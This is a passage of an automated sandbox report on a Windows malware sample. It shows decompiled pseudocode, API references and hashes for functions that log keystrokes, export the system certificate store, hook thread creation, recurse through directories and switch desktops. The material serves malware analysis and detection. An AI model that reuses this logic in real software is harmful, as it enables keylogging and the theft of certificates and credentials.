				_t67 =  *0x41272c; // 0x0
				if(_t67 == 0) {
					goto L15;
				} else {
					 *0x41272c =  *0x41272c + 0xffff;
					_t35 =  *0x412a64; // 0x246f5a8
					_t60 = E00407D61( *((intOrPtr*)(_t35 + 0x70)), 0x1e, 0x1f4);
					if(_t60 != 0) {
						_t39 = GetCurrentProcessId();
						_t40 =  *0x412a64; // 0x246f5a8
						wnsprintfW( &_v524, 0x103,  *(_t40 + 0x74), _t56, _t39);
						E00410E5B(_t51, _t60,  &_v520);
						 *((intOrPtr*)( *_t60 + 8))(_t60, GetTickCount());
					}
					goto L10;
				}
			}




















    0x004056b3
    0x004056b9
    0x004056c9
    0x004057f0
    0x004057f6
    0x004057f6
    0x004056cf
    0x004056d7
    0x00405767
    0x00000000
    0x00000000
    0x00405775
    0x0040577d
    0x00000000
    0x00000000
    0x00405787
    0x0040578a
    0x00000000
    0x00000000
    0x0040578c
    0x0040578e
    0x00405798
    0x004057a0
    0x004057b8
    0x004057c0
    0x004057d2
    0x004057d6
    0x004057de
    0x004057eb
    0x004057eb
    0x004057de
    0x004057c0
    0x00000000
    0x004057a0
    0x004056dd
    0x004056e4
    0x00000000
    0x004056ea
    0x004056ef
    0x004056f6
    0x0040570a
    0x0040570e
    0x00405727
    0x0040572e
    0x00405744
    0x00405755
    0x0040575d
    0x0040575d
    0x00000000
    0x0040570e

    APIs
    • GetTickCount.KERNEL32 ref: 00405720
    • GetCurrentProcessId.KERNEL32(00000000), ref: 00405727
    • wnsprintfW.SHLWAPI ref: 00405744
    • GetKeyState.USER32(00000011), ref: 0040576F
    • GetKeyState.USER32(00000012), ref: 00405781
    • GetKeyboardState.USER32(?), ref: 00405798
    • ToUnicode.USER32(?,00000000,?,?,00000001,00000000), ref: 004057B8
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000001,00000000,00000000), ref: 004057D6
      • Part of subcall function 00407D61: LoadLibraryA.KERNELBASE(?), ref: 00407D78
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407D8C
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407DA1
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407DB6
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407DCB
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407DE0
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407DF5
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407E0A
      • Part of subcall function 00407D61: LoadLibraryA.KERNELBASE(?), ref: 00407E66
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407E7A
      • Part of subcall function 00407D61: LoadLibraryA.KERNELBASE(?), ref: 00407E9E
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407EB2
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407EC6
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407EDB
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407EF0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$LibraryLoadState$ByteCharCountCurrentKeyboardMultiProcessTickUnicodeWidewnsprintf
    • String ID: unknown
    • API String ID: 1117135736-2904991687
    • Opcode ID: 1c1cceccacc251a422eb73dcb1113c2b237503ecb8c6db4a6ccc2e5ba8821016
    • Instruction ID: 13dd452c579fea961c17610e0d6b63a161909147fde0071d2cb0a0b63813d6ef
    • Opcode Fuzzy Hash: 1c1cceccacc251a422eb73dcb1113c2b237503ecb8c6db4a6ccc2e5ba8821016
    • Instruction Fuzzy Hash: 38310272500205AFDB20DFA8DD88EEB77ECEB48340F04443AF945E7292D678DD54AB69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040A077, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75fileCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040A077(WCHAR* __ecx, intOrPtr __edx) {
				short _v524;
				short _v532;
				char _v540;
				short _v1076;
				short _v1078;
				struct _WIN32_FIND_DATAW _v1124;
				struct _WIN32_FIND_DATAW _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				void* _t29;
				signed char _t46;
				void* _t52;
				WCHAR* _t55;

				_t55 = __ecx;
				_v1132.ftLastAccessTime = __edx;
				PathCombineW( &_v524, __ecx, "*");
				_t29 = FindFirstFileW( &_v532,  &_v1124);
				_v1132.dwFileAttributes = _v1132.dwFileAttributes & 0x00000000;
				_t52 = _t29;
				if(_t52 == 0xffffffff) {
					L13:
					return _v1132.dwFileAttributes;
				} else {
					goto L1;
				}
				L11:
				if(FindNextFileW(_t52,  &_v1132) != 0) {
					L1:
					if(_v1124.cFileName != 0x2e || _v1078 != 0 && (_v1078 != 0x2e || _v1076 != 0)) {
						_t46 = _v1124.dwFileAttributes >> 0x00000004 & 0x00000001;
						if(_t46 != 0 || PathMatchSpecW( &(_v1124.cFileName), _v1132.ftCreationTime) != 0) {
							PathCombineW( &_v532, _t55,  &(_v1124.cFileName));
							if(_t46 == 0) {
								if(E0040DD3C( &_v540) != 0) {
									_v1140 = _v1140 + 1;
								}
							} else {
								_v1140 = _v1140 + E0040A077( &_v540, _v1136);
							}
						}
					}
					goto L11;
				} else {
					FindClose(_t52);
					goto L13;
				}
			}
















    0x0040a08b
    0x0040a096
    0x0040a09a
    0x0040a0ad
    0x0040a0b3
    0x0040a0b8
    0x0040a0bd
    0x0040a160
    0x0040a16a
    0x00000000
    0x00000000
    0x00000000
    0x0040a145
    0x0040a153
    0x0040a0c3
    0x0040a0c9
    0x0040a0ea
    0x0040a0ed
    0x0040a110
    0x0040a118
    0x0040a13f
    0x0040a141
    0x0040a141
    0x0040a11a
    0x0040a12a
    0x0040a12a
    0x0040a118
    0x0040a0ed
    0x00000000
    0x0040a159
    0x0040a15a
    0x00000000
    0x0040a15a

    APIs
    • PathCombineW.SHLWAPI(?,?,00401040,00000000,00000000,00000000), ref: 0040A09A
    • FindFirstFileW.KERNEL32(?,?), ref: 0040A0AD
    • PathMatchSpecW.SHLWAPI(?,?), ref: 0040A0F8
    • PathCombineW.SHLWAPI(?,?,0000002E), ref: 0040A110
    • FindNextFileW.KERNEL32(00000000,?,?), ref: 0040A14B
    • FindClose.KERNEL32(00000000), ref: 0040A15A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FindPath$CombineFile$CloseFirstMatchNextSpec
    • String ID: .$.
    • API String ID: 1774936002-3769392785
    • Opcode ID: 6ffe1b02f7f884b3d4d1746e8b022701e3e5643fa5994c2518c4caad3d80b5fb
    • Instruction ID: 616cf19c8545a9b498d636c37242e3a6fc1e683da75de21dfc1dd9590866db16
    • Opcode Fuzzy Hash: 6ffe1b02f7f884b3d4d1746e8b022701e3e5643fa5994c2518c4caad3d80b5fb
    • Instruction Fuzzy Hash: 4D219C315083459BC720DF64D888AAB77F8FB85314F00493EF584D61D0E7799969C79B
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00403DAD, Relevance: 13.6, APIs: 9, Instructions: 108encryptiontimeCOMMON
    Download Yara Rule
    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 00403DC6
    • PFXExportCertStore.CRYPT32(00000000,?,?,00000004), ref: 00403DF1
    • PFXExportCertStore.CRYPT32(00000000,?,?,00000004), ref: 00403E49
    • GetSystemTime.KERNEL32(?), ref: 00403E5C
    • wnsprintfW.SHLWAPI ref: 00403E89
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 00403ED0
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 00403EBD
    • CertDeleteCRLFromStore.CRYPT32(00000000), ref: 00403EC8
    • CertCloseStore.CRYPT32(00000000,00000000), ref: 00403EE7
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Cert$Store$ExportSystem$AllocateCertificateCertificatesCloseContextDeleteDuplicateEnumFromHeapOpenTimewnsprintf
    • String ID:
    • API String ID: 2815783250-0
    • Opcode ID: cde3e0e3174e037eb7f28989472ad42635e7b9af0623c7ab6d7b91b36a2b4540
    • Instruction ID: 5a1f29d30ed2a74827ae42b4523f4d4ed2054d9e65b94fc630f46f228d202559
    • Opcode Fuzzy Hash: cde3e0e3174e037eb7f28989472ad42635e7b9af0623c7ab6d7b91b36a2b4540
    • Instruction Fuzzy Hash: 8531C270108301AFC721DF65DD449ABBFEDEB88701F004A3AF954E2190D379DA10CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00409115, Relevance: 12.1, APIs: 8, Instructions: 74memorysynchronizationpipeCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00409115(void* __ecx, void* __eflags, void* _a4, intOrPtr _a8) {
				short _v524;
				void* __edi;
				void* _t19;
				void* _t33;
				void** _t36;

				_t33 = __ecx;
				E00408F6C( &_v524, _a8);
				_t36 = RtlAllocateHeap( *0x413e5c, 8, 0x18);
				if(_t36 != 0) {
					_t19 = CreateNamedPipeW( &_v524, 3, 6, 0xff, 0x200, 0x200, 0, 0);
					 *_t36 = _t19;
					if(_t19 != 0xffffffff) {
						_t36[1] = CreateEventW(0, 0, 0, 0);
						_t36[2] = CreateEventW(0, 0, 0, 0);
						_t36[3] = _a4;
						_t36[4] = E0040D0A7(_a8);
						if(E0040A04D(_t33, E00408F8D, _t36) != 0) {
							WaitForSingleObject(_t36[2], 0xffffffff);
							return _t36;
						}
						CloseHandle( *_t36);
						CloseHandle(_t36[1]);
						CloseHandle(_t36[2]);
						E0040CF40(_t36[4]);
					}
					E0040CF40(_t36);
				}
				return 0;
			}








    0x00409115
    0x00409129
    0x0040913e
    0x00409144
    0x00409166
    0x0040916c
    0x00409171
    0x00409189
    0x00409195
    0x0040919b
    0x004091a9
    0x004091b3
    0x004091de
    0x00000000
    0x004091e4
    0x004091b7
    0x004091c0
    0x004091c9
    0x004091d2
    0x004091d2
    0x00409174
    0x00409174
    0x00000000

    APIs
      • Part of subcall function 00408F6C: lstrcpyW.KERNEL32(?,\\.\pipe\), ref: 00408F75
      • Part of subcall function 00408F6C: lstrcpyW.KERNEL32(?,?), ref: 00408F83
    • RtlAllocateHeap.NTDLL(00000008,00000018,?), ref: 00409138
    • CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00000200,00000200,00000000,00000000,?,00000001), ref: 00409166
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000001), ref: 0040917F
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000001), ref: 0040918C
      • Part of subcall function 0040A04D: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0040A063
      • Part of subcall function 0040A04D: CloseHandle.KERNEL32(00000000,?,?,00408598,00408418,00000000), ref: 0040A06A
    • CloseHandle.KERNEL32(00000000,00408F8D,00000000,?,00000001), ref: 004091B7
    • CloseHandle.KERNEL32(?,?,00000001), ref: 004091C0
    • CloseHandle.KERNEL32(?,?,00000001), ref: 004091C9
      • Part of subcall function 0040CF40: HeapFree.KERNEL32(00000000,00000000,0040958E,00000000,00000001), ref: 0040CF53
    • WaitForSingleObject.KERNEL32(?,000000FF,00408F8D,00000000,?,00000001), ref: 004091DE
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCreateHandle$EventHeaplstrcpy$AllocateFreeNamedObjectPipeSingleThreadWait
    • String ID:
    • API String ID: 2368775089-0
    • Opcode ID: f64153033765fdea8b9e832eac11dd348388d25997d671cbce703252eecefb64
    • Instruction ID: 6edf2b1480bc95e501bfbcec51ca995fab891ec610460a8f35d82cef5620de89
    • Opcode Fuzzy Hash: f64153033765fdea8b9e832eac11dd348388d25997d671cbce703252eecefb64
    • Instruction Fuzzy Hash: 4E218030600302ABD7316F36DD0CD9BBEB9FB85750F00853AB9A6E21E1DB789911DB58
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00411039, Relevance: 9.1, APIs: 6, Instructions: 92filesynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00411039() {
				char _v5;
				struct _WIN32_FIND_DATAW _v604;
				short _v1124;
				void* __esi;
				void* _t23;
				void* _t25;
				intOrPtr _t28;
				void* _t29;
				intOrPtr _t30;
				intOrPtr _t32;
				int _t35;
				void* _t44;

				_v5 = 0;
				E00411018( &_v1124);
				_t23 = FindFirstFileW( &_v1124,  &_v604);
				if(_t23 == 0xffffffff) {
					L5:
					_t25 = FindFirstFileW(0x413260,  &_v604);
					__eflags = _t25 - 0xffffffff;
					if(_t25 == 0xffffffff) {
						L16:
						return _v5;
					}
					FindClose(_t25);
					__eflags = _v604.nFileSizeLow;
					if(_v604.nFileSizeLow > 0) {
						L8:
						_t28 =  *0x412a64; // 0x246f5a8
						_t29 = CreateMutexW(0x413468, 0,  *(_t28 + 0x20));
						__eflags = _t29;
						if(_t29 == 0) {
							_t44 = 0;
							__eflags = 0;
						} else {
							_t44 = E0040F16D(_t29);
						}
						_t30 =  *0x412a64; // 0x246f5a8
						E00409266(__eflags,  *((intOrPtr*)(_t30 + 0x2c)), 8, 0, 0, 0, 0);
						__eflags = _v604.nFileSizeHigh;
						if(_v604.nFileSizeHigh <= 0) {
							__eflags = _v604.nFileSizeLow;
							if(__eflags > 0) {
								_t35 = MoveFileExW(0x413260,  &_v1124, 3);
								__eflags = _t35;
								_t16 =  &_v5;
								 *_t16 = _t35 != 0;
								__eflags =  *_t16;
							}
						} else {
							E0040DD3C(0x413260);
						}
						_t32 =  *0x412a64; // 0x246f5a8
						E00409266(__eflags,  *((intOrPtr*)(_t32 + 0x2c)), 7, 0, 0, 0, 0);
						E0040F18E(_t44);
						goto L16;
					}
					__eflags = _v604.nFileSizeHigh;
					if(_v604.nFileSizeHigh <= 0) {
						goto L16;
					}
					goto L8;
				}
				FindClose(_t23);
				if(_v604.nFileSizeLow <= 0 || _v604.nFileSizeHigh != 0) {
					E0040DD3C( &_v1124);
					goto L5;
				} else {
					return 1;
				}
			}















    0x0041104e
    0x00411051
    0x00411064
    0x0041106d
    0x00411099
    0x004110a6
    0x004110ac
    0x004110af
    0x0041114b
    0x00000000
    0x0041114b
    0x004110b6
    0x004110bc
    0x004110c2
    0x004110cc
    0x004110cc
    0x004110da
    0x004110e0
    0x004110e2
    0x004110ef
    0x004110ef
    0x004110e4
    0x004110eb
    0x004110eb
    0x004110f1
    0x004110ff
    0x00411104
    0x0041110a
    0x00411114
    0x0041111a
    0x00411126
    0x0041112c
    0x0041112e
    0x0041112e
    0x0041112e
    0x0041112e
    0x0041110c
    0x0041110d
    0x0041110d
    0x00411132
    0x00411140
    0x00411146
    0x00000000
    0x00411146
    0x004110c4
    0x004110ca
    0x00000000
    0x00000000
    0x00000000
    0x004110ca
    0x00411070
    0x0041107c
    0x00411094
    0x00000000
    0x00411086
    0x00000000
    0x00411086

    APIs
      • Part of subcall function 00411018: lstrcpyW.KERNEL32(00411377,00413260), ref: 00411021
      • Part of subcall function 00411018: lstrcatW.KERNEL32(?,.lll), ref: 00411030
    • FindFirstFileW.KERNEL32(?,?,?,?,?,?), ref: 00411064
    • FindClose.KERNEL32(00000000,?,?,?), ref: 00411070
    • FindFirstFileW.KERNEL32(00413260,?,?,?,?), ref: 004110A6
    • FindClose.KERNEL32(00000000,?,?,?), ref: 004110B6
    • CreateMutexW.KERNEL32(Function_00013468,00000000,?,?,?,?), ref: 004110DA
    • MoveFileExW.KERNEL32(00413260,?,00000003,?,00000008,00000000,00000000,00000000,00000000,?,?,?), ref: 00411126
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Find$File$CloseFirst$CreateMoveMutexlstrcatlstrcpy
    • String ID:
    • API String ID: 1879962031-0
    • Opcode ID: c49d8f8ce2ec92350ab08919c9416b1b1fd825c3927ae6fe70ba11250d49b870
    • Instruction ID: baac77c77af060c36f091461c942ff6f492aa6d784d21192ae79297750f282fe
    • Opcode Fuzzy Hash: c49d8f8ce2ec92350ab08919c9416b1b1fd825c3927ae6fe70ba11250d49b870
    • Instruction Fuzzy Hash: 57318FB1D04158BACB20ABA4DD84AEE777CAB09355F0042BAF304E2561D7784EC58B69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040F89A, Relevance: 9.1, APIs: 6, Instructions: 79fileCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040F89A(void* __ecx, intOrPtr* __edx, WCHAR* _a4, WCHAR* _a8, signed int _a12) {
				short _v540;
				char _v548;
				short _v1044;
				short _v1052;
				char _v1068;
				struct _WIN32_FIND_DATAW _v1644;
				signed char _v1660;
				void* __esi;
				int _t25;
				void* _t46;
				intOrPtr* _t52;
				void* _t55;

				_t52 = __edx;
				_t55 = __ecx;
				_t25 = PathCombineW( &_v1044, _a4, "*");
				if(_t25 == 0) {
					L12:
					return _t25;
				}
				_t25 = FindFirstFileW( &_v1052,  &_v1644);
				_t46 = _t25;
				if(_t46 == 0xffffffff) {
					goto L12;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E0040DD5A( &(_v1644.cFileName)) == 0 && PathCombineW( &_v1052, _a4,  &(_v1644.cFileName)) != 0 && PathCombineW( &_v540, _a8,  &(_v1644.dwReserved0)) != 0) {
						if((_v1660 & 0x00000010) == 0) {
							if(E0040F7C1(_t55,  &_v1068,  &_v548) != 0) {
								 *_t52 =  *_t52 + 1;
							}
						} else {
							if((_a12 & 0x00000001) != 0) {
								E0040F89A(_t55, _t52,  &_v1068,  &_v548, _a12);
							}
						}
					}
				} while (FindNextFileW(_t46,  &_v1644) != 0);
				_t25 = FindClose(_t46);
				goto L12;
			}















    0x0040f8b9
    0x0040f8bb
    0x0040f8bd
    0x0040f8c5
    0x0040f98b
    0x0040f991
    0x0040f991
    0x0040f8d8
    0x0040f8de
    0x0040f8e3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040f8e9
    0x0040f8e9
    0x0040f8f4
    0x0040f92f
    0x0040f96c
    0x0040f96e
    0x0040f96e
    0x0040f931
    0x0040f935
    0x0040f94e
    0x0040f94e
    0x0040f935
    0x0040f92f
    0x0040f97c
    0x0040f985
    0x00000000

    APIs
    • PathCombineW.SHLWAPI(?,?,00401040,00000000,00000000,00000000), ref: 0040F8BD
    • FindFirstFileW.KERNEL32(?,?), ref: 0040F8D8
    • PathCombineW.SHLWAPI(?,?,?), ref: 0040F906
    • PathCombineW.SHLWAPI(?,?,?), ref: 0040F920
    • FindNextFileW.KERNEL32(00000000,?), ref: 0040F976
    • FindClose.KERNEL32(00000000), ref: 0040F985
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CombineFindPath$File$CloseFirstNext
    • String ID:
    • API String ID: 3830188700-0
    • Opcode ID: c7f3d30fee771c94ebbb84010eb9ca13bc15842e8b04f7fba2ae8831480b82f1
    • Instruction ID: 4bb6f29023889f541fb04fed0da692a6136fd4339c4f44ec3a9529f2010b6bfd
    • Opcode Fuzzy Hash: c7f3d30fee771c94ebbb84010eb9ca13bc15842e8b04f7fba2ae8831480b82f1
    • Instruction Fuzzy Hash: 102139B1108349ABCB209F61DC48FDB77ACAF88304F04493AB955D21A1EB79D519C769
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00406C0D, Relevance: 9.1, APIs: 6, Instructions: 67threadnativeprocessCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00406C0D(CONTEXT* __ebx, void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, void* _a20, struct _EXCEPTION_RECORD _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
				long _v8;
				intOrPtr _v16;
				intOrPtr _v28;
				void _v32;
				intOrPtr _v48;
				void* _v60;
				void* _t29;
				int _t33;
				CONTEXT* _t37;
				void* _t40;

				_t37 = __ebx;
				if(NtQueryInformationProcess(_a20, 0,  &_v32, 0x18,  &_v8) != 0 || _v28 == 0) {
					L13:
					return NtCreateThread(_a8, _a12, _a16, _a20, _a24, _t37, _a28, _a32);
				} else {
					_v8 = 0;
					if(_v16 == 0) {
						L11:
						_t29 = E00406689(_a20);
						if(_t29 != 0) {
							 *((intOrPtr*)(_t37 + 0xb0)) = _t29 + _a4;
						}
						goto L13;
					}
					_t40 = CreateToolhelp32Snapshot(4, 0);
					if(_t40 == 0) {
						L10:
						if(_v8 != 0) {
							goto L13;
						}
						goto L11;
					}
					_v60 = 0x1c;
					_t33 = Thread32First(_t40,  &_v60);
					while(_t33 != 0) {
						if(_v48 == _v16) {
							_v8 = _v8 + 1;
						}
						_t33 = Thread32Next(_t40,  &_v60);
					}
					CloseHandle(_t40);
					goto L10;
				}
			}













    0x00406c0d
    0x00406c2c
    0x00406c9d
    0x00406cbb
    0x00406c33
    0x00406c33
    0x00406c39
    0x00406c86
    0x00406c89
    0x00406c90
    0x00406c97
    0x00406c97
    0x00000000
    0x00406c90
    0x00406c45
    0x00406c49
    0x00406c80
    0x00406c84
    0x00000000
    0x00000000
    0x00000000
    0x00406c84
    0x00406c50
    0x00406c57
    0x00406c75
    0x00406c65
    0x00406c67
    0x00406c67
    0x00406c6f
    0x00406c6f
    0x00406c7a
    0x00000000
    0x00406c7a

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00406C24
    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00406C3F
    • Thread32First.KERNEL32(00000000,?), ref: 00406C57
    • Thread32Next.KERNEL32(00000000,0000001C), ref: 00406C6F
    • CloseHandle.KERNEL32(00000000), ref: 00406C7A
    • NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 00406CB3
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CreateThread32$CloseFirstHandleInformationNextProcessQuerySnapshotThreadToolhelp32
    • String ID:
    • API String ID: 1144773994-0
    • Opcode ID: adab92d85314989b88e37dfce0848f72f061b79c578219fcb7549d0a3005826b
    • Instruction ID: 596c9f776b276621e0bae4b006aec3e198cf7ed78c82a74da0b49fd940cfe074
    • Opcode Fuzzy Hash: adab92d85314989b88e37dfce0848f72f061b79c578219fcb7549d0a3005826b
    • Instruction Fuzzy Hash: 9F212731904109EFEF229FA0DD489EFBB79EF44B44F018026F906A11A0D7349A61DBA8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00406EBD, Relevance: 9.1, APIs: 6, Instructions: 59fileCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00406EBD(void* __ecx, void* __edx, void* __eflags, signed int _a8) {
				short _v524;
				char _v532;
				short _v1072;
				struct _WIN32_FIND_DATAW _v1120;
				short _v1636;
				short _v1640;
				void* _t23;
				int _t27;
				void* _t35;
				void* _t36;
				WCHAR* _t38;
				void* _t39;

				_t36 = __edx;
				_t35 = __ecx;
				_t14 = _a8;
				_t38 = E0040D379(_a8 | 0xffffffff,  *_t14);
				if(_t38 != 0) {
					ExpandEnvironmentStringsW(_t38,  &_v1636, 0x103);
					E0040CF40(_t38);
					_t39 = FindFirstFileW( &_v1640,  &_v1120);
					__eflags = _t39;
					if(_t39 != 0) {
						PathRemoveFileSpecW( &_v1636);
						do {
							__eflags = _v1120.ftCreationTime.dwFileAttributes & 0x00000010;
							if(__eflags == 0) {
								PathCombineW( &_v524,  &_v1636,  &_v1072);
								E00410F35(_t35, _t36, __eflags,  &_v532, 0,  &_v532);
							}
							_t27 = FindNextFileW(_t39,  &(_v1120.ftCreationTime));
							__eflags = _t27;
						} while (_t27 != 0);
						FindClose(_t39);
					}
					_t23 = 1;
				} else {
					_t23 = 0;
				}
				return _t23;
			}















    0x00406ebd
    0x00406ebd
    0x00406ec3
    0x00406ed7
    0x00406edb
    0x00406eef
    0x00406ef6
    0x00406f0e
    0x00406f10
    0x00406f12
    0x00406f19
    0x00406f1f
    0x00406f1f
    0x00406f27
    0x00406f3e
    0x00406f4f
    0x00406f4f
    0x00406f5d
    0x00406f63
    0x00406f63
    0x00406f68
    0x00406f68
    0x00406f6e
    0x00406edd
    0x00406edd
    0x00406edd
    0x00406f74

    APIs
    • ExpandEnvironmentStringsW.KERNEL32(00000000,00000103,00000103,?), ref: 00406EEF
    • FindFirstFileW.KERNEL32(?,?,00000000), ref: 00406F08
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 00406F19
    • PathCombineW.SHLWAPI(?,?,?), ref: 00406F3E
    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00406F5D
    • FindClose.KERNEL32(00000000), ref: 00406F68
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FileFind$Path$CloseCombineEnvironmentExpandFirstNextRemoveSpecStrings
    • String ID:
    • API String ID: 3464319278-0
    • Opcode ID: e9163ff96485a56d8eea79f39cd3f16921394b319b621041185a7e0632e42f7a
    • Instruction ID: 3dad15c2c43bd6d0f5ec2c982fc2b6c135fbad336af831e86131d67f0efbdbb5
    • Opcode Fuzzy Hash: e9163ff96485a56d8eea79f39cd3f16921394b319b621041185a7e0632e42f7a
    • Instruction Fuzzy Hash: 2B119472404259ABC731DB60DC48EDF77ECAF45310F00462AF965D2190EB78D65487AE
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040DE73, Relevance: 9.1, APIs: 6, Instructions: 53encryptionCOMMON
    Download Yara Rule
    APIs
    • CryptAcquireContextW.ADVAPI32(0040FCF8,00000000,00000000,00000001,F0000040,?,0040FCF8,00000000,?,-0000001C,00000000,?,?,?), ref: 0040DE8C
    • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 0040DEA4
    • CryptHashData.ADVAPI32(?,00000010), ref: 0040DEBF
    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 0040DED6
    • CryptDestroyHash.ADVAPI32(?), ref: 0040DEED
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040DEF7
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
    • String ID:
    • API String ID: 3186506766-0
    • Opcode ID: 9acb7b93bd282e57beb9a87d643aad872fbc030a24f8bb6734c427fa92ca9854
    • Instruction ID: c8ca6a164ed4834670f66c6ddd87b823e3b388fd5e94be7586e4f167e062c62d
    • Opcode Fuzzy Hash: 9acb7b93bd282e57beb9a87d643aad872fbc030a24f8bb6734c427fa92ca9854
    • Instruction Fuzzy Hash: 83110371A00209BFEF219BA0CC48FEF7B7CEF14384F008465B511A51A0D7B68A299B28
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00409EE6, Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00409EE6() {
				intOrPtr _t3;
				intOrPtr _t8;
				long _t12;
				struct HWINSTA__* _t13;
				struct HDESK__* _t15;

				_t3 =  *0x412a64; // 0x246f5a8
				_t12 = 0;
				_t13 = OpenWindowStationA( *(_t3 + 0x78), 0, 0x10000000);
				if(_t13 != 0) {
					if(SetProcessWindowStation(_t13) != 0) {
						_t8 =  *0x412a64; // 0x246f5a8
						_t15 = OpenDesktopA( *(_t8 + 0x7c), 0, 0, 0x10000000);
						if(_t15 != 0) {
							SetThreadDesktop(_t15);
							_t12 = 1;
							CloseDesktop(_t15);
						}
					}
					CloseWindowStation(_t13);
				}
				return _t12;
			}








    0x00409ee6
    0x00409ef4
    0x00409f00
    0x00409f04
    0x00409f0f
    0x00409f11
    0x00409f22
    0x00409f26
    0x00409f29
    0x00409f30
    0x00409f32
    0x00409f32
    0x00409f26
    0x00409f39
    0x00409f39
    0x00409f44

    APIs
    • OpenWindowStationA.USER32(?,00000000,10000000), ref: 00409EFA
    • SetProcessWindowStation.USER32(00000000), ref: 00409F07
    • OpenDesktopA.USER32(?,00000000,00000000,10000000), ref: 00409F1C
    • SetThreadDesktop.USER32(00000000), ref: 00409F29
    • CloseDesktop.USER32(00000000), ref: 00409F32
    • CloseWindowStation.USER32(00000000), ref: 00409F39
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: DesktopStationWindow$CloseOpen$ProcessThread
    • String ID:
    • API String ID: 2658375134-0
    • Opcode ID: 325c9b147cd5b1911a1b42a7d90234a1db04b4cee7558b10c032773ab46f002d
    • Instruction ID: 5fe93f8376a6b322802e991380d85bb2286055e71b2690749cbd6c082b1a9494
    • Opcode Fuzzy Hash: 325c9b147cd5b1911a1b42a7d90234a1db04b4cee7558b10c032773ab46f002d
    • Instruction Fuzzy Hash: 74F054B27220256FD7202F68AD8CDEB3BACEF4A291F058076F501D3270C7A94C219778
    Uniqueness

